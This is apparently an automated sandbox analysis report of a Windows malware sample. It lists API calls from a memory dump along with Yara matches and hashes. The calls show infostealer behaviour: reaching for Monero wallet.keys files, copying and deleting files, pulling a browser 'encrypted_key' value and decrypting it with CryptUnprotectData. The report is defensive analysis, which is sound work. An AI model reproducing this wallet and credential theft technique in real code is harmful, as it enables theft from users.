                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,008D9BB8,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00D3A3FF
                              • lstrlen.KERNEL32(00000000), ref: 00D3A6BC
                                • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00D3A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 7122a964b414726954bf3f1d2f071eae59a116d60e4694c2de093601539bdffb
                              • Instruction ID: eae38fd510842dabaa083300f8d31e3322ad164dc73cfb37da3c4618db5c3a9d
                              • Opcode Fuzzy Hash: 7122a964b414726954bf3f1d2f071eae59a116d60e4694c2de093601539bdffb
                              • Instruction Fuzzy Hash: 85E1ED72850118ABEB15FBA8DC92EEE7338EF54304F518169F516B6091EF306A4DCB72
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,008D9BB8,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D481
                              • lstrlen.KERNEL32(00000000), ref: 00D3D698
                              • lstrlen.KERNEL32(00000000), ref: 00D3D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00D3D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: ee392926dfde5d29402c1376b3bf04e4bbd56da528a811036ef5a7e8cfefacb8
                              • Instruction ID: af098c426f7b9fdf2dee618d6c252d65c12d67ffb54557ee3396bca1aa2c27f1
                              • Opcode Fuzzy Hash: ee392926dfde5d29402c1376b3bf04e4bbd56da528a811036ef5a7e8cfefacb8
                              • Instruction Fuzzy Hash: 83912072850118ABEB04FBA8DC92EEE7339EF54304F514569F507B6092EF346A49CB72
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                                • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,008D9BB8,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D801
                              • lstrlen.KERNEL32(00000000), ref: 00D3D99F
                              • lstrlen.KERNEL32(00000000), ref: 00D3D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00D3DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: fafeca9f6a4a0b536e5985982710c2e9a4faad3cfa0adffd873251538bffc09f
                              • Instruction ID: dc1ade036a89be8e7d23605ca322a674c967e57ca19bad55de2e35bbb6da6f98
                              • Opcode Fuzzy Hash: fafeca9f6a4a0b536e5985982710c2e9a4faad3cfa0adffd873251538bffc09f
                              • Instruction Fuzzy Hash: 80812D728501189BEB04FBA8DC92EEE7339EF54304F514529F407B6092EF346A49CBB2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 1c271c47c5aa2efe056ecdb1acb9bf87108b78aa54f4339ceeb82498b9403cb0
                              • Instruction ID: fd2ac6ea8b4900622e03f071c8d3d5949b349896e7955537b2bab5a980cf4e03
                              • Opcode Fuzzy Hash: 1c271c47c5aa2efe056ecdb1acb9bf87108b78aa54f4339ceeb82498b9403cb0
                              • Instruction Fuzzy Hash: 6C412E71D14209AFDF04EFA8D845AEEB774EF54304F148018F81676291DB75AA49CFB2
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                                • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                                • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                                • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                                • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                                • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                                • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D39D39
                                • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39AEF
                                • Part of subcall function 00D39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00D34EEE,00000000,?), ref: 00D39B01
                                • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39B2A
                                • Part of subcall function 00D39AC0: LocalFree.KERNEL32(?,?,?,?,00D34EEE,00000000,?), ref: 00D39B3F
                                • Part of subcall function 00D39B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D39B84
                                • Part of subcall function 00D39B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00D39BA3
                                • Part of subcall function 00D39B60: LocalFree.KERNEL32(?), ref: 00D39BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: f11f06779eece05c3cf3101826bb8d39d06734bddfcc062b5896b0a4c00112ca
                              • Instruction ID: 04d133b2008f0feb1de8ef08336e5fc1e691d773cbadb19cb3259f0d567c855c
                              • Opcode Fuzzy Hash: f11f06779eece05c3cf3101826bb8d39d06734bddfcc062b5896b0a4c00112ca
                              • Instruction Fuzzy Hash: 37312FB6D10209ABCF14DFE4DC96AEFB7B8EF48304F184519E905A7241EB749A05CBB1
                              APIs
                              • CreateFileA.KERNEL32(00D43AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00D43AEE,?), ref: 00D492FC
                              • GetFileSizeEx.KERNEL32(000000FF,00D43AEE), ref: 00D49319
                              • CloseHandle.KERNEL32(000000FF), ref: 00D49327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: d1bc7c5384f2df8913f396e0c6db724032b3caca6a4fc0bedf2627a0b77274ca
                              • Instruction ID: ae9a10ebb245fde290d2ef09c79049fe71e8557ca2d78d5ae76a12bad3d8acf8
                              • Opcode Fuzzy Hash: d1bc7c5384f2df8913f396e0c6db724032b3caca6a4fc0bedf2627a0b77274ca
                              • Instruction Fuzzy Hash: C3F0A934E00208BBDB14DFB1DC19F9EB7B9AB88320F11C254BA55A72C0D670AA419B51
                              APIs
                              • __getptd.LIBCMT ref: 00D4C74E
                                • Part of subcall function 00D4BF9F: __amsg_exit.LIBCMT ref: 00D4BFAF
                              • __getptd.LIBCMT ref: 00D4C765
                              • __amsg_exit.LIBCMT ref: 00D4C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00D4C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 35a1ff5c8c591069060a818e2164055f79535bb6c5585f41e61c65dabcb8a52b
                              • Instruction ID: 29935a6414632201ced1ed2a2306b2e1e77edaa955fd15cc666faa069bb0ad2e
                              • Opcode Fuzzy Hash: 35a1ff5c8c591069060a818e2164055f79535bb6c5585f41e61c65dabcb8a52b
                              • Instruction Fuzzy Hash: 51F0B4329527109BDB70BBBC5807B5D33A0EF10732F24514AF844A62D2DB6499449E76
                              APIs
                                • Part of subcall function 00D48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00D48E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00D44F7A
                              • lstrcat.KERNEL32(?,00D51070), ref: 00D44F97
                              • lstrcat.KERNEL32(?,008D89F0), ref: 00D44FAB
                              • lstrcat.KERNEL32(?,00D51074), ref: 00D44FBD
                                • Part of subcall function 00D44910: wsprintfA.USER32 ref: 00D4492C
                                • Part of subcall function 00D44910: FindFirstFileA.KERNEL32(?,?), ref: 00D44943
                                • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FDC), ref: 00D44971
                                • Part of subcall function 00D44910: StrCmpCA.SHLWAPI(?,00D50FE0), ref: 00D44987
                                • Part of subcall function 00D44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00D44B7D
                                • Part of subcall function 00D44910: FindClose.KERNEL32(000000FF), ref: 00D44B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: bfdeca920183c7508590d2e13523a352ce13fd56b4b7783b0235e610f31b1fd6
                              • Instruction ID: 7abd70461d1d544a86826db372bc2bc92e33cb0c372b89da0884d4f52500f952
                              • Opcode Fuzzy Hash: bfdeca920183c7508590d2e13523a352ce13fd56b4b7783b0235e610f31b1fd6
                              • Instruction Fuzzy Hash: 0421867A9402086BCB54FBB0DC46EED333CEB98301F004558BA5992181EE749ACC9BB3